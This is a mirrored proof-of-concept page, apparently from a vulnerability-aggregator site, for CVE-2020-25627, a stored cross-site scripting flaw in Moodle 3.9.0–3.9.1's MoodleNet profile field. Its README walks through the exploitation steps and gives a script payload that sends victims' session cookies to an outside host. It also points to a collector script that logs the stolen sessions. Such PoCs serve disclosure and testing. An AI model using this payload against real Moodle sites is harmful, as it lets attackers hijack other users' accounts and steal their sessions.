CVE-2020-25627 PoC — Moodle 跨站脚本漏洞

Source

https://github.com/HoangKien1020/CVE-2020-25627

Associated Vulnerability

Title:Moodle 跨站脚本漏洞 (CVE-2020-25627)
Description:The moodlenetprofile user profile field required extra sanitizing to prevent a stored XSS risk. This affects versions 3.9 to 3.9.1. Fixed in 3.9.2.

Description

Stored XSS via moodlenetprofile parameter in user profile

Readme

# CVE-2020-25627
Stored XSS via moodlenetprofile parameter in user profile

My PoC about this CVE

User requirement: Student ( Or the site for registeration)

XSS in moodlenetprofile
```
Step 1: Log in with an authenticated user (Can register or through creating a new user without assigning roles )

Step 2: Quick access to Edit profile

domain/moodle/user/edit.php?id=<your user_id>&returnto=profile

In MoodleNet profile, add the script as:

<script>alert("HK")</script>

And save:

Step 3: Anytime, the other user goes to view your profile, the stored XSS will trigger.

Steal cookie via script:

<script>var i=new Image;i.src="http://192.168.0.238/xss.php?"+document.cookie;</script>

Change your domain and upload xss.php to your host:

https://github.com/HoangKien1020/pentest/tree/master/XSS

Done. You can view log.txt to get Moodle session.
```
![moodlenetprofile parameter](https://user-images.githubusercontent.com/24661746/122549897-3387b600-d05d-11eb-9adf-bfc783ddde63.png)


Affected version: 3.9.0 , 3.9.1

Source

https://moodle.org/mod/forum/discuss.php?d=410839

Impact about XSS (steal cookies,...), see here:

https://github.com/HoangKien1020/pentest/tree/master/XSS

File Snapshot


 [4.0K]  /data/pocs/31a63490c2d9f7324acce08610cf2c79a195dbfe
└── [1.2K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!